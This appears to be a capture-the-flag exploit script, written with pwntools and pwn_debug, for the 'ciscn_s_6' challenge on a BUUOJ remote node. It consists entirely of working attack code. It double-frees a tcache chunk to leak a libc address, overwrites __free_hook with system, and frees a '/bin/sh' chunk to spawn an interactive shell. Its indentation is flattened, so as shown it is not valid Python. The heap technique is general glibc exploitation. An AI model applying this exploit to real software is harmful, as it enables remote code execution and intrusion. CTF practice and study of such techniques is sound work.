exp
from pwn_debug import *
context.binary = './ciscn_s_6'
context.log_level = 'debug'
pdbg = pwn_debug('./ciscn_s_6')
pdbg.local('/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',
'/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-linux-x86-64.so.2')
pdbg.remote('node3.buuoj.cn',29810)
#p = pdbg.run('local')
p = pdbg.run('remote')
#libc = pdbg.libc
libc = ELF('./libc/libc-2.27.so')
elf = ELF('./ciscn_s_6')
#elf = pdbg.elf
def add(size,name,number):
p.sendlineafter('choice:',str(1))
p.sendlineafter("Please input the size of compary's name",str(size))
p.sendafter('please input name:',name)
p.sendafter('please input compary call:',number)
def show(idx):
p.sendlineafter('choice:',str(2))
p.sendlineafter('Please input the index:',str(idx))
def delete(idx):
p.sendlineafter('choice:',str(3))
p.sendlineafter('Please input the index:',str(idx))
add(0x90,'aaaa','1111')# 0
add(0x20,'bbbb','1111')# 1
for i in range(7):
delete(0)
delete(0)
show(0)
p.recvuntil('name:')
unsorted_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print 'unsorted_addr:' + hex(unsorted_addr)
libcbase = unsorted_addr - 0x3ebca0
free_hook = libcbase + libc.symbols['__free_hook']
system = libcbase + libc.symbols['system']
print 'free_hook:'+hex(free_hook)
print 'system:' +hex(system)
delete(1)
delete(1)
add(0x20,p64(free_hook),'1111')# 2
add(0x20,'bbbb','1111')# 3
add(0x20,p64(system),'1111')# 4
add(0x20,'/bin/sh\x00','1111')# 5
delete(5)
#gdb.attach(p)
p.interactive()
